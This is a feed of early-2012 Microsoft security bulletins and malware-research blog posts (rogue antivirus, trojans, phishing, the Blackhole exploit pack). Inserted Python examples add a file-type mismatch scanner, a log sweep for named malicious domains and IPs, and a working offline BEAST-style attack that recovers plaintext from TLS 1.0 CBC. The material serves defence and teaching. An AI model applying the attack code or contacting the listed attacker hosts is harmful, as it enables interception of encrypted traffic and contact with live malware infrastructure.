Microsoft

MS11-100 - Critical : Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2638420) - Version: 1.3

Microsoft Security Bulletins - Wed, 01/02/2012 - 09:00
Severity Rating: Critical
Revision Note: V1.3 (February 1, 2012): Corrected registry keys and installation switches in the deployment tables for Windows Server 2003 and Windows Server 2008, and installation switches in the deployment table for Windows Vista. This is an informational change only. There were no changes to the security update files or detection logic.
Summary: This security update resolves one publicly disclosed vulnerability and three privately reported vulnerabilities in Microsoft .NET Framework. The most severe of these vulnerabilities could allow elevation of privilege if an unauthenticated attacker sends a specially crafted web request to the target site. An attacker who successfully exploited this vulnerability could take any action in the context of an existing account on the ASP.NET site, including executing arbitrary commands. In order to exploit this vulnerability, an attacker must be able to register an account on the ASP.NET site, and must know an existing user name.
Categories: Microsoft, Security

MS11-098 - Important : Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2633171) - Version: 1.1

Microsoft Security Bulletins - Wed, 01/02/2012 - 09:00
Severity Rating: Important
Revision Note: V1.1 (February 1, 2012): Added a link to Microsoft Knowledge Base Article 2633171 under Known Issues in the Executive Summary.
Summary: This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application designed to exploit the vulnerability. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.
Categories: Microsoft, Security

When imitation isn’t a form of flattery

Microsoft Malware Protection Center - Mon, 30/01/2012 - 01:06

When I was at school (many, many years ago…) a teacher once told me that if someone copies you, it's a sign of flattery. Well, right now there are numerous "companies" copying us, but we are far from flattered.

For some time now, rogue security programs have been trying their hardest to look just like Microsoft security products. I suppose they figure that the more they look like us, the more likely unsuspecting users are to hand over their hard earned cash to have their computers "cleaned" by these imposters.

Lately, we have seen a resurgence in rogue activity (one particularly obnoxious threat going by the name Security Defender – aka Win32/Defmid – has been making the rounds of late); rogue security programs attempt to trick users into paying for fake antivirus software, when Microsoft consumer products, namely Microsoft Security Essentials, Safety Scanner and Windows Defender are available to all genuine Windows users at no cost. This in turn causes affected users to voice their concerns and dissatisfaction through a number of Microsoft customer feedback channels, often after being tricked into paying for the bogus antivirus to remove threats that were more than likely never present on their computer. Below are some images of imitation scans and messages displayed by rogues:

Figure 1: 'Scan results' displayed by a Win32/FakeRean variant, Privacy Protection

Figure 2: 'Windows Security Center' message displayed by a Win32/FakeRean variant

Figure 3: 'Scanner' displayed by a Win32/FakeVimes variant

Figure 4: 'Scan results' displayed by a Win32/FakeVimes variant

Figure 5: 'Security settings options' displayed by a Win32/FakeVimes variant

In addition to an increase in the number of people being affected by rogues, there seems to be an increase in users receiving calls, allegedly from Microsoft support, about their "infected" computers (which Microsoft has blogged about before). To set the record straight, Microsoft would never call a user to tell them that their computer was infected.

So, allow me to clarify a few things:

  • Our consumer products, namely Microsoft Security Essentials, Safety Scanner and Windows Defender are available to all genuine Windows users for free. That's right – we offer these products at no cost! So please, do not enter your credit card details into a program that looks like one of ours, as this is most likely a rogue.
  • We do not pop up on your screen every 30 seconds, minute, 90 seconds, etc. Rogues, however, will pester you and pester you until you either a) click OK and concede to buy their malicious program, or b) remove them once and for all with a reputable antivirus.
  • Microsoft will never cold-call a user. Ever. If you receive one of these phone calls, hang up.

We will continue to fight the good fight, and do what we can to prevent the spread of malicious programs; but in the meantime, stay safe online, and think twice before handing over your credit card details to a third party you cannot verify – like one displaying pop-ups, or on the end of an unsolicited phone call.

Jasmine Sesso
MMPC Melbourne

Categories: Microsoft, Security

MS12-004 - Critical : Vulnerabilities in Windows Media Could Allow Remote Code Execution (2636391) - Version: 1.2

Microsoft Security Bulletins - Fri, 27/01/2012 - 09:00
Severity Rating: Critical
Revision Note: V1.2 (January 27, 2012): Corrected the aggregate severity rating for the KB2631813 update package in the Affected Software table for all supported editions of Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008. This is a bulletin change only. There were no changes to the security update files or detection logic. Customers should apply all update packages offered for the software installed on their systems. See the update FAQ for details.
Summary: This security update resolves two privately reported vulnerabilities in Microsoft Windows. The vulnerabilities could allow remote code execution if a user opens a specially crafted media file. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
Categories: Microsoft, Security

Summary for January 2012 - Version: 2.1

Microsoft Security Bulletins - Fri, 27/01/2012 - 09:00
Revision Note: V2.1 (January 27, 2012): For MS12-004, corrected the aggregate severity rating for the KB2631813 update package for all supported editions of Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008. See the MS12-004 bulletin for details.
Summary: This bulletin summary lists security bulletins released for January 2012.
Categories: Microsoft, Security

Independent social welfare site hacked to serve malware?

Microsoft Malware Protection Center - Thu, 26/01/2012 - 12:18

We received a submission from one of our customers that downloaded some suspicious files from a certain website. We checked the files, confirmed that they are actually malicious and added detection for them as Trojan:BAT/Delosc.A. Everything seemed normal, until we looked at the website that the files were downloaded from, which suggested that there's more to it than meets the eye.

The website in question is a Romanian website, asistentasociala [dot] info. The term "asistenta sociala" translates to "social welfare", and is apparently quite popular. Doing a web search for the term "asistenta sociala" on various search engines, we found that the website is ranked within the first two pages of the results.

The website contains various official documents and examples on how they are filled out. It seems to have been hacked, because the original documents have been replaced with malicious executable files (detected as Trojan:BAT/Delosc.A - sample SHA1 759e3dc00415809d0df748e23dcbec1c0265afc1), as seen in Figure 1 below:

DOC replaced with EXE file

Fig. 1 The .doc file is replaced by an .exe file. (The word "cerere" translates to "request" or "application".)

The malicious files have the same icon as the original documents, so that when they are saved to your computer, you might not notice anything out of the ordinary. In Figure 2 below, the downloaded malicious executables have the icons of an Excel file, a PDF file, and a Word file:

regular icons but EXE files

Fig. 2 The malicious executable using misleading icons.

When run, the malicious executable drops the original document, as in Figure 3. This is probably done to make it appear as if nothing unexpected has occurred:

EXE drops original DOC

Fig. 3 The malicious executable drops the original document.

It also drops a BAT file (also detected as Trojan:BAT/Delosc.A - SHA1 ECD0C54B085BDBBECF25FA44EEF69F9B5F776621) in the Temporary Files folder as "open_file.bat". This file does the rest of the malicious actions.

The BAT file tries to delete files and folders from two software solutions mainly used in Romanian institutions: Indaco (software that offers services for legal documentation) and Aplxpert (a document management system based on regulations designed for public administration).

It also proceeds to delete folders (along with the files inside) that contain the following strings: "aplxpert", "indaco" (as previously mentioned), "mondo", "agr", "factur" (invoice), "gami", "multi", "glob", "alocati", "arenda", "social", "assist", "vmg", "asf", "lemne" (wood), "incalz" (heating) on the C, D, E, F, G, H drives, as you can see from the malware code in Figure 4:

malware code

Fig. 4 The malware code showing the strings.

Based on these actions, it seems like if you're working for a Romanian government institution and your computer gets infected by this malware, you may no longer be able to use either of these tools. In addition, folders containing files pertinent to your work may be deleted if you named your folders using any of the mentioned strings.

Aside from government employees, it also looks like this malware could cause trouble for a user who is searching for documents related to social welfare. For example, if you're looking for help on how to fill out a form for heating assistance, you might end up inadvertently having files deleted from your computer if you saved them within a folder that uses any of these strings.

The website owner has been contacted and the malicious files have been removed.

Replacing the original documents with malicious executables is something we have seen before. But this trojan is deleting files that the user seems to be looking for help for, while at the same time posing as those very files. In the process, actual important official documents may be deleted, thus posing a very real threat to users.

We recommend that you always pay attention to the downloaded files and look out for files that have the icon for one file type but the extension for another. And as always, run an antivirus solution to protect your computer against these kinds of threats. For website owners, make sure you take steps to harden your website so that you can protect its integrity.

--

Andrei Saygo && Daniel Radu

MMPC Dublin
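The recommendation above (watch for files whose icon says one type and whose extension says another) can be checked without trusting the icon at all, by comparing each file's leading bytes with what its name claims. The following is an added example, not MMPC tooling; the sample download folder it builds is constructed, and the double-extension check goes slightly beyond the post, which only describes same-name .doc-to-.exe swaps with borrowed icons.

```python
"""Spot downloads whose content does not match the name they carry.

Added example, not MMPC tooling. Sample files below are constructed.
"""
import os
import tempfile
from pathlib import Path

# Leading bytes of the container types the post mentions.
MAGICS = [
    (b"MZ", "pe"),                                   # Windows executable (DOS stub)
    (b"%PDF", "pdf"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),    # legacy .doc / .xls compound file
    (b"PK\x03\x04", "zip"),                          # .docx / .xlsx are zip containers
]
# What a given extension should contain.
EXPECTED = {
    ".exe": "pe", ".scr": "pe", ".com": "pe", ".dll": "pe",
    ".doc": "ole", ".xls": "ole", ".docx": "zip", ".xlsx": "zip", ".pdf": "pdf",
}
DOC_EXTS = {".doc", ".xls", ".docx", ".xlsx", ".pdf"}
EXEC_EXTS = {".exe", ".scr", ".com", ".dll"}


def content_kind(path):
    """Classify a file by its leading bytes, ignoring the name entirely."""
    with open(path, "rb") as fh:
        head = fh.read(8)
    for magic, kind in MAGICS:
        if head.startswith(magic):
            return kind
    return "unknown"


def assess(path):
    """Return a finding for one file, or None when name and content agree."""
    p = Path(path)
    suffixes = [s.lower() for s in p.suffixes]
    ext = suffixes[-1] if suffixes else ""
    kind = content_kind(p)
    reasons = []
    expected = EXPECTED.get(ext)
    if expected and kind != "unknown" and kind != expected:
        # e.g. formular.pdf that actually starts with MZ
        reasons.append("name says %s but content is %s" % (ext, kind))
    if ext in EXEC_EXTS and len(suffixes) >= 2 and suffixes[-2] in DOC_EXTS:
        # e.g. tabel.xls.exe: a document-looking name that Explorer may show as tabel.xls
        reasons.append("document-style name ends in %s" % ext)
    severity = "alert" if reasons else None
    if kind == "pe" and not reasons:
        # Honest .exe, but the post's victims expected a document, so still surface it.
        reasons.append("executable where a document was expected; check its icon and source")
        severity = "notice"
    if not reasons:
        return None
    return {"name": p.name, "kind": kind, "severity": severity, "reasons": reasons}


def scan_folder(folder):
    """Assess every regular file in a download folder; returns findings sorted by name."""
    findings = []
    for entry in sorted(os.listdir(folder)):
        full = os.path.join(folder, entry)
        if os.path.isfile(full):
            finding = assess(full)
            if finding:
                findings.append(finding)
    return findings


def build_sample_folder():
    """Constructed stand-in for a download folder like the one in the post."""
    folder = tempfile.mkdtemp(prefix="delosc-demo-")
    samples = {
        "cerere.doc": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24,  # genuine legacy Word file
        "cerere.exe": b"MZ" + b"\x90" * 62,                                  # the swapped-in executable
        "formular.pdf": b"MZ" + b"\x90" * 62,                                # executable behind a .pdf name
        "tabel.xls.exe": b"MZ" + b"\x90" * 62,                               # double extension
        "ghid.docx": b"PK\x03\x04" + b"\x00" * 28,                           # genuine OOXML file
    }
    for name, content in samples.items():
        with open(os.path.join(folder, name), "wb") as fh:
            fh.write(content)
    return folder


if __name__ == "__main__":
    for f in scan_folder(build_sample_folder()):
        print("%-8s %-15s %s" % (f["severity"], f["name"], "; ".join(f["reasons"])))
```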

Categories: Microsoft, Security

A different breed of downloader

Microsoft Malware Protection Center - Tue, 24/01/2012 - 18:35

In our everyday world, we sometimes make use of thin clients, which don't have a lot of functionality but are easy to maintain, as their functionality is based on data they receive from remote servers. Malware authors have adopted a similar technique, in which malware is able to download executable code without actually downloading an executable image. We're talking about malware that isn't a typical trojan downloader.

The typical routine for trojan downloaders is that the downloaded file is normally modified on the server side, and the downloader itself offers only a download and execute function, which is cheap to produce and therefore expendable in terms of antivirus detection. As a result, we currently detect over eight million trojan downloaders for Windows, most of which download the executable to disc or inject it into other processes.

Unfortunately there is no need for malware writers to download an executable at all. We recently analyzed a sample, TrojanDownloader:Win32/Poison.A (SHA1: 2cc1b2cca8d07b55144141625aea3e61f2eca182), that downloads a blob of position-independent code and executes it in the context of an application that was, until then, not malicious.

At first, the sample appeared to be a very small Visual Basic-written application that accesses the website of a Tibetan restaurant. I expected a trojan downloader using the normal routine, but during fast static analysis I couldn't see any file access operation, or any other suspicious system call. Instead, it simply displayed Figure 1 below:

Error message displayed when run on an isolated machine

Figure 1: Error message displayed when run on an isolated machine

Once the application was run on a machine with a simulated Internet connection, it got the contents of the HTML page of the restaurant website mentioned previously. The application copied itself to the Windows system folder as "misys.exe" (as shown in Figure 2 below), and started keylogging, although the static analysis did not indicate this kind of functionality.

The file misys.exe on a computer connected to the Internet

Figure 2: The file "misys.exe" on a computer connected to the Internet

The question is: where does that file come from? The mystery was solved when I looked at the HTML code of the restaurant webpage, which begins with the following hex instructions:

&H55, &H8B, &HEC

These bytes make up the standard x86 function prologue:

The assembly code for the hex instructions

Figure 3: The assembly code for the hex instructions

So the VB application extends its functionality dynamically by downloading and executing x86 instructions in the context of its own process. The "downloader" becomes malware by executing this downloaded blob of x86 instructions. The downloaded instructions are neither injected into a different process nor dropped to disc; they run in the process context of the "downloader", so the "downloader" inherits the malware functionality.

After the whole HTML page was converted into binary as in Figure 4, the file name in Figure 2 was clearly visible:

The file name is visible after conversion to binary

Figure 4: The file name is visible after conversion to binary

The downloaded binary blob is a variant of the Win32/Poison family. The functionality of the downloaded code is widely documented in its entry in the MMPC Encyclopedia.

The Win32/Poison trojan can be created with an easy-to-use Builder Tool, which allows malware authors to customize a build according to what they want to steal. We discuss the kit and its distribution in the MMPC Threat Report – Poison Ivy paper we released in November of this year. A possible reason why Win32/Poison is so prevalent, although it's quite an old trojan, is the fact that it allows malware authors to create with one click of the mouse, position-independent code that has the trojan functionality, instead of creating an executable, as shown in Figure 5:

Win32/Poison builder allowing shellcode or PE creation

Figure 5: Win32/Poison builder allowing shellcode or PE creation

So while the malware we discussed here, TrojanDownloader:Win32/Poison.A, is a different kind of trojan that takes a while to build, in minutes it was just another threat detected by Microsoft AV products.

 

-- MMPC

Categories: Microsoft, Security

MS11-049 - Important : Vulnerability in the Microsoft XML Editor Could Allow Information Disclosure (2543893) - Version: 2.3

Microsoft Security Bulletins - Tue, 24/01/2012 - 09:00
Severity Rating: Important
Revision Note: V2.3 (January 24, 2012): Added an entry to the update FAQ to announce a detection change for KB2251481, KB2251487, and KB2251489 to correct an installation issue. This is a detection change only. There were no changes to the security update files. Customers who have already successfully updated their systems do not need to take any action.
Summary: This security update resolves a privately reported vulnerability in Microsoft XML Editor. The vulnerability could allow information disclosure if a user opened a specially crafted Web Service Discovery (.disco) file with one of the affected software listed in this bulletin. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to produce information that could be used to try to further compromise the affected system.
Categories: Microsoft, Security

MS11-025 - Important : Vulnerability in Microsoft Foundation Class (MFC) Library Could Allow Remote Code Execution (2500212) - Version: 4.2

Microsoft Security Bulletins - Tue, 24/01/2012 - 09:00
Severity Rating: Important
Revision Note: V4.2 (January 24, 2012): Added an entry to the update FAQ to announce a detection change for KB2538242, KB2538243, KB2467173, KB2538218, KB2538241, and KB2542054 to correct an installation issue. This is a detection change only. There were no changes to the security update files. Customers who have already successfully updated their systems do not need to take any action.
Summary: This security update resolves a publicly disclosed vulnerability in certain applications built using the Microsoft Foundation Class (MFC) Library. The vulnerability could allow remote code execution if a user opens a legitimate file associated with such an affected application, and the file is located in the same network folder as a specially crafted library file. For an attack to be successful, a user must visit an untrusted remote file system location or WebDAV share and open a document from this location that is then loaded by the affected application.
Categories: Microsoft, Security

Fake Seattle traffic ticket notification leads to malware

Microsoft Malware Protection Center - Fri, 20/01/2012 - 01:22

Our partners at the City of Seattle sent us a warning today about a phishing campaign which targets users very close to home -- specifically, Seattle Washington. They're seeing spam mail circulating that claims to be from Seattle Department of Motor Vehicles, stating that the victim is charged with a traffic offense, and requesting that they fill out a linked form:

Fake Seattle traffic ticket spam

Variations of this email are turning up; all of them have similar content and a “check sum” tag line. Only the hyperlink and the time and date of the “offense” changes among iterations of the spam. It's interesting to note that the "Date of Offense" is in European format (DD/MM/YYYY), which is a strange deviation from the date format used in most of the U.S. (MM/DD/YYYY). So far, we’ve seen the hyperlink point to several recently registered domains.

If the link is visited, the browser requests the page and loads an IFrame from yet another site, which was registered on January 16, 2012 and is hosted in the Ukraine at IP 93.190.44.171. This Ukrainian site contains an obfuscated JavaScript that attempts to exploit an issue in MDAC (Microsoft Security Bulletin MS06-014) that was mitigated by a Windows security update in 2006.

If the exploit is successful, it will download and execute a file named "info.exe" from the domain “doofyonmycolg.ru”. At the time of writing, we detect this file as Worm:Win32/Cridex.B (SHA1: 2f9ccfcf645162856ec92d79fa983e22e1024051). Once the malware is running, it tries to connect to “jahramainso.com” (IP 95.57.120.104, registered January 11, 2012) using SSL. The malware is able to update itself through communicating with the server. At present, this host is serving the exact same file as the malware running on the affected computer (SHA1: 2f9ccfcf645162856ec92d79fa983e22e1024051).

We started seeing reports of this file earlier today, although we were not previously aware of the distribution vehicle until the City of Seattle alerted us about the spam. It's also interesting to note that the doofyonmycolg.ru domain was registered only a few days ago, so this is a new spam campaign.

While this particular campaign is new, Win32/Cridex variants originated around September 2011. As is usually the case, the malware authors attempted to evade detection by updating the malware and altering the hosts that it communicates with. You can read more about Worm:Win32/Cridex.B in the MMPC malware encyclopedia.

The best way to remain protected against this type of attack is to:

• Keep your security software and Windows security updates current
• Teach yourself to recognize and avoid phishing emails and other messages

Also, note that neither the Seattle Police Department nor the Department of Motor Vehicles (DMV) sends tickets by email -- only by “snail mail” (post). The Seattle Police Department published an alert on their site at the following link: http://spdblotter.seattle.gov/2012/01/19/beware-phishy-email-titled-seattle-traffic-ticket/

-- Tareq Saade, Microsoft Security Response Center 
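Matching the indicators quoted in this post against web-proxy logs, as an added example that is not part of the post: the domains and IP addresses are the ones named above; the Squid-style access-log lines, the 10.20.30.x client addresses and the 203.0.113.x server addresses are constructed for the example. The SHA1 of info.exe quoted above is a file-level indicator and is not used here.

```python
"""Sweep proxy logs for the Cridex campaign indicators quoted in the MMPC post.

Added example, not from the post. Log layout is Squid access.log style:
timestamp elapsed client cache-code bytes method url user hierarchy/server-ip type.
The log lines, client addresses and 203.0.113.x server addresses are constructed.
"""
from urllib.parse import urlparse

# Indicators quoted in the post
IOC_DOMAINS = {"doofyonmycolg.ru", "jahramainso.com"}
IOC_IPS = {"93.190.44.171", "95.57.120.104"}

# Constructed sample log: one iframe fetch, one payload download, one SSL C2 connection,
# one subdomain variant, and two benign lines.
ACCESS_LOG = """\
1327013401.512    312 10.20.30.40 TCP_MISS/200 2231 GET http://www.example.com/news - DIRECT/203.0.113.10 text/html
1327013402.118    140 10.20.30.40 TCP_MISS/200 1180 GET http://93.190.44.171/in.php - DIRECT/93.190.44.171 text/html
1327013403.907    905 10.20.30.40 TCP_MISS/200 96256 GET http://doofyonmycolg.ru/info.exe - DIRECT/203.0.113.20 application/octet-stream
1327013409.332   4012 10.20.30.40 TCP_TUNNEL/200 5120 CONNECT jahramainso.com:443 - DIRECT/95.57.120.104 -
1327013415.001    220 10.20.30.41 TCP_MISS/200 3310 GET http://cdn.jahramainso.com/u.bin - DIRECT/203.0.113.30 application/octet-stream
1327013420.777     90 10.20.30.42 TCP_HIT/200 512 GET http://www.example.org/ - NONE/- text/css
"""


def parse_line(line):
    """Return (timestamp, client, method, host, server_ip) for one log line, or None if malformed."""
    f = line.split()
    if len(f) < 9:
        return None
    ts, client, method, target, hierarchy = f[0], f[2], f[5], f[6], f[8]
    if method == "CONNECT":
        host = target.rsplit(":", 1)[0]        # CONNECT lines carry host:port, not a URL
    else:
        host = urlparse(target).hostname
    server_ip = hierarchy.split("/", 1)[1] if "/" in hierarchy else None
    return ts, client, method, host, server_ip


def domain_matches(host, domains):
    """Exact or subdomain match, so cdn.jahramainso.com hits jahramainso.com."""
    return host is not None and any(host == d or host.endswith("." + d) for d in domains)


def scan(log_text):
    """Return one hit per matching line with the reasons it matched."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, client, method, host, server_ip = rec
        reasons = []
        if domain_matches(host, IOC_DOMAINS):
            reasons.append("domain:" + host)
        if host in IOC_IPS:                    # URL that addresses the IOC IP directly
            reasons.append("url-ip:" + host)
        if server_ip in IOC_IPS:               # resolved address, catches new domains on known hosts
            reasons.append("server-ip:" + server_ip)
        if reasons:
            hits.append({"ts": ts, "client": client, "method": method, "host": host, "why": reasons})
    return hits


def affected_clients(hits):
    """Internal addresses that touched any indicator, for follow-up triage."""
    return sorted({h["client"] for h in hits})


if __name__ == "__main__":
    found = scan(ACCESS_LOG)
    for h in found:
        print(h["ts"], h["client"], h["method"], h["host"], ", ".join(h["why"]))
    print("clients to triage:", affected_clients(found))
```

Matching on the server address as well as the hostname is what catches the post's point that the operators rotate domains while keeping the hosts; a domain-only rule misses the next campaign on the same server.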

Categories: Microsoft, Security

Microsoft Security Advisory (2641690): Fraudulent Digital Certificates Could Allow Spoofing - Version: 3.0

Microsoft Security Bulletins - Thu, 19/01/2012 - 09:00
Revision Note: V3.0 (January 19, 2012): Revised to announce the release of an update for Windows Mobile 6.x, Windows Phone 7, and Windows Phone 7.5 devices.
Summary: Microsoft is aware that DigiCert Sdn. Bhd, a Malaysian subordinate certification authority (CA) under Entrust and GTE CyberTrust, has issued 22 certificates with weak 512-bit RSA keys. Keys that short can be factored with modest computing resources; an attacker who recovers the private key could use the certificates fraudulently to spoof content, perform phishing attacks, or perform man-in-the-middle attacks against all Web browser users, including users of Internet Explorer. While this is not a vulnerability in a Microsoft product, this issue affects all supported releases of Microsoft Windows.
Categories: Microsoft, Security

MS12-006 - Important : Vulnerability in SSL/TLS Could Allow Information Disclosure (2643584) - Version: 1.1

Microsoft Security Bulletins - Wed, 18/01/2012 - 09:00
Severity Rating: Important
Revision Note: V1.1 (January 18, 2012): Added MS10-085 as a bulletin replaced by the KB2585542 update for Windows 7 for 32-bit Systems, Windows 7 for x64-based Systems, Windows Server 2008 R2 for x64-based Systems, and Windows Server 2008 R2 for Itanium-based Systems. This is an informational change only. There were no changes to the detection logic or the update files.
Summary: This security update resolves a publicly disclosed vulnerability in SSL 3.0 and TLS 1.0 (CVE-2011-3389, the so-called BEAST attack). This vulnerability affects the protocol itself and is not specific to the Windows operating system. The vulnerability could allow information disclosure if an attacker who can intercept encrypted web traffic served from an affected system can also cause the victim's browser to send chosen plaintext over the same connection. TLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are not affected, because the weakness lies in the use of the previous record's last ciphertext block as the IV for the next record.
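The bulletin names the weakness but not the mechanism. The following is an added illustration, not code from Microsoft or from the bulletin, of why TLS 1.0's CBC chaining leaks plaintext (the BEAST technique). Assumptions: an 8-round SHA-256 Feistel network stands in for AES so the script needs only the standard library; the record layer is modelled without MAC or padding; SECRET is a constructed cookie that the victim's browser appends to attacker-chosen request bytes, which is the chosen-plaintext channel the real attack obtained through a browser-side component; class and function names are invented here.

```python
"""Why TLS 1.0 CBC chaining leaks plaintext: a BEAST-style chained-IV attack, modelled offline.

Added example, not from the bulletin. The block cipher is a toy Feistel network standing
in for AES; the record layer omits MAC and padding; SECRET and all names are constructed.
"""
import hashlib
import os

BLOCK = 16
SECRET = b"sid=7b3f9c1e04aa"  # constructed 16-byte secret (a session cookie in the real attack)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def block_encrypt(key, block):
    """Toy 128-bit block cipher: an invertible Feistel network, so distinct inputs give distinct outputs."""
    left, right = block[:8], block[8:]
    for rnd in range(8):
        f = hashlib.sha256(key + bytes([rnd]) + right).digest()[:8]
        left, right = right, xor(left, f)
    return left + right


class Tls10Sender:
    """CBC sender whose IV for the next record is the last ciphertext block of the previous one."""

    def __init__(self, key):
        self.key = key
        self.chain = os.urandom(BLOCK)  # IV of the very first record

    def send(self, plaintext):
        assert len(plaintext) % BLOCK == 0, "padding is out of scope for this model"
        out, prev = [], self.chain
        for i in range(0, len(plaintext), BLOCK):
            prev = block_encrypt(self.key, xor(prev, plaintext[i:i + BLOCK]))
            out.append(prev)
        self.chain = prev  # the flaw: the attacker has already seen this block on the wire
        return b"".join(out)


class Tls11Sender(Tls10Sender):
    """TLS 1.1 behaviour: a fresh random IV per record, so the next IV cannot be predicted."""

    def send(self, plaintext):
        self.chain = os.urandom(BLOCK)
        return super().send(plaintext)


def beast_recover(sender, secret):
    """Recover `secret` byte by byte using only chosen plaintext and observed ciphertext."""

    def victim_send(prefix):
        # The victim encrypts attacker-chosen bytes followed by the secret in one record.
        body = prefix + secret
        return sender.send(body + b"\x00" * (-len(body) % BLOCK))

    recovered = b""
    for k in range(len(secret)):
        # Choose the prefix length so that secret[k] is the last byte of a block whose
        # other 15 bytes are known (prefix bytes plus already recovered secret bytes).
        pad = (BLOCK - 1 - k) % BLOCK + BLOCK
        prefix = b"A" * pad
        ct = victim_send(prefix)
        j = (pad + k) // BLOCK
        c_prev, c_target = ct[(j - 1) * BLOCK:j * BLOCK], ct[j * BLOCK:(j + 1) * BLOCK]
        known15 = (prefix + recovered)[j * BLOCK:j * BLOCK + BLOCK - 1]
        iv_next = ct[-BLOCK:]  # attacker's prediction of the IV of the next record
        for g in range(256):
            guess = known15 + bytes([g])
            # CBC encrypts iv_next XOR X; pick X so that this equals c_prev XOR guess,
            # which is exactly the input c_target was computed from if the guess is right.
            probe = sender.send(xor(xor(c_prev, guess), iv_next))
            iv_next = probe[-BLOCK:]
            if probe[-BLOCK:] == c_target:
                recovered += bytes([g])
                break
        else:
            return None  # no guess verified: the IV was not predictable
    return recovered


def run_demo():
    key = os.urandom(16)
    return beast_recover(Tls10Sender(key), SECRET), beast_recover(Tls11Sender(key), SECRET)


if __name__ == "__main__":
    tls10, tls11 = run_demo()
    print("TLS 1.0 model recovered:", tls10)
    print("TLS 1.1 model recovered:", tls11)
```

With the TLS 1.0 model every byte is verified after at most 256 probes; with the TLS 1.1 model the first byte never verifies, because the attacker's predicted IV is wrong, which is exactly why the bulletin lists TLS 1.1 and later as unaffected.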
Categories: Microsoft, Security

Summary for June 2011 - Version: 3.1

Microsoft Security Bulletins - Wed, 18/01/2012 - 09:00
Revision Note: V3.1 (January 18, 2012): For MS11-049, added a note to the Affected Software and Download Locations section to clarify that this update also applies to 32-bit and x64-based SQL Server 2008 and SQL Server 2008 R2 Express and Express Advanced Editions.
Summary: This bulletin summary lists security bulletins released for June 2011.
Categories: Microsoft, Security

MS12-007 - Important : Vulnerability in AntiXSS Library Could Allow Information Disclosure (2607664) - Version: 2.1

Microsoft Security Bulletins - Mon, 16/01/2012 - 09:00
Severity Rating: Important
Revision Note: V2.1 (January 16, 2012): Added a link to Microsoft Knowledge Base Article 2607664 under Known Issues in the Executive Summary. Also, revised entry in the update FAQ to clarify why the upgrade to AntiXSS Library version 4.2.1 is only available from the Microsoft Download Center.
Summary: This security update resolves one privately reported vulnerability in the Microsoft Anti-Cross Site Scripting (AntiXSS) Library. The vulnerability could allow information disclosure if an attacker passes a malicious script to a website using the sanitization function of the AntiXSS Library. The consequences of the disclosure of that information depend on the nature of the information itself. Note that this vulnerability would not allow an attacker to execute code or to elevate the attacker's user rights directly, but it could be used to produce information that could be used to try to further compromise the affected system. Only sites that use the sanitization module of the AntiXSS Library are affected by this vulnerability.
Categories: Microsoft, Security

Plenty to complain about with faux BBB spam

Microsoft Malware Protection Center - Thu, 12/01/2012 - 14:24

I was recently having a conversation online in a forum about online reputation and about refuting false claims posted on customer complaint sites. In this particular conversation I was having, the person was falsely accused of bad business practices.

In the States, if you experience an injustice from a bad business dealing, you can complain and report that business to an organization named the Better Business Bureau (BBB). In this particular incident, the falsely accused party wasn't reported to the BBB, but a claim was posted to a site named "ripoffreport".

In a slight coincidence, and not long after the conversation, I noticed an email message in my inbox with the subject "Re: BBB Case # 77518746" and a spoofed sender email address impersonating the Better Business Bureau, complete with a copy of the official BBB logo, obviously from the BBB site. The email body contained a hyperlink, and an ominous claim about a "complaint from one of your associates":

BBB spam

I learned that the BBB is aware of the spam, has posted an alert on its site, and offers the following suggestion:

To verify the legitimacy of BBB complaints, contact Better Business Bureau locally. Consumers or businesses who have received the fraudulent emails are asked to report them to http://bbb.org/scam/report-a-scam.

The hyperlink in the message labeled "click here" pointed to an HTML page, "index.html", on a compromised domain. I retrieved the index page; its content was very minimal, yet suspicious, with links to a JavaScript file named "ajaxam.js" (example SHA1: eba97868820c92a3fd8cd2d3671b530c6c434b7c) on three other domains:

Malicious 'index.html' page

The domains referenced in the page appear to have been compromised for this attack. Two of the links for the "ajaxam.js" script were dead but a third was not. That .JS file contained a single document.location instruction redirecting to a server-side PHP script on yet another domain (SHA1: ff27f95681c1dd19ad48e133107d532f6f6f8644):

ajaxam.js script content


This request results in the delivery of an obfuscated script file that, when run, attempts to exploit CVE-2010-1885, the "Help Center URL Validation Vulnerability" fixed by Microsoft Security Bulletin MS10-042. On a vulnerable computer, this script exploit would have dropped and executed malware detected as PWS:Win32/Zbot.gen!AF (hash as given in the original post: 291aa262ab0a41675b733d1cddfb5b4b, which at 32 hex digits is MD5 length rather than SHA-1).

This pattern of redirection followed by obfuscated script carrying this particular set of exploits is the signature of the "Blackhole" exploit pack, also known as Blacole.

Blackhole (image courtesy of MMPC)

This BBB spam run occurred at least twice in December and used Blacole. The Blacole exploit pack is developed and sold as a collection of attack code bundling various exploits. It is typically purchased by an attacker and installed on servers that have already been compromised through other means. Across its iterations, the pack has attempted to exploit vulnerabilities including the following in order to deliver and install malware on vulnerable computers:

  • CVE-2006-0003 - Unspecified vulnerability in the RDS.Dataspace ActiveX control in Microsoft Data Access Components (MDAC)
  • CVE-2007-5659 - Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier
  • CVE-2008-2992 - Adobe Reader "util.printf" Vulnerability
  • CVE-2009-0927 - Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 (multiple versions) allows remote attackers to execute arbitrary code
  • CVE-2009-1671 - Java buffer overflows in the Deployment Toolkit ActiveX control in "deploytk.dll"
  • CVE-2010-0188 - Adobe Acrobat Bundled Libtiff Integer Overflow Vulnerability
  • CVE-2010-0840 - Sun Java JRE Trusted Methods Chaining Remote Code Execution Vulnerability
